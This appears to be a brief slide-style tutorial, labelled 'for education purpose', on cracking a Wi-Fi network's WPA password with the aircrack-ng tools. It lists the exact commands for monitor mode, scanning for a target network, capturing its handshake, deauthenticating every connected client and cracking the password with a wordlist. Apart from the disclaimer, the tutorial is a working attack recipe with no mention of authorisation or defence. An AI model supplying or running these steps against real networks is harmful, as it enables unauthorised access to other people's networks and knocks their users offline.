Only For Education Purpose WIFI HACKING Only For Education Purpose
Content Wifi Hacking
Steps First you should have linux and Wifi interface card Open terminal of linux Type “ ifconfig ” to know your wifi interface.
Step 2 Type “airmon-ng”. To see driver, chipset and interface here you see your interface is “wlan0” . Now you have to put your interface to monitor mode . Type “ airmon-ng start wlan0 ” for above .
Step 3 If any process create problem then …. Type “ airmon-ng check kill ”. Now type “airodump-ng wlan0mon ”, to know the all nearby wifi connection. After selecting the target press “ Ctrl + c” , to stop the process.
Step 4 Open new terminal.. Type “ airodump-ng –c [channel no.] –bssid [bssid] –w /root/Desktop/anayname wlan0mon” . Above command for capture the handshake in your system.
Step 5 Now we have to kick all the client connected to that network. Type “ aireplay-ng -0 0 –a [mac address of wifi router] –c [mac address of the client connected to the router] wlan0mon
Last Step Type “ aircrack-ng –w [location of wordlist] [location of captured packet] ”. This will check the password in encrypted form present in captured packet to wordlist.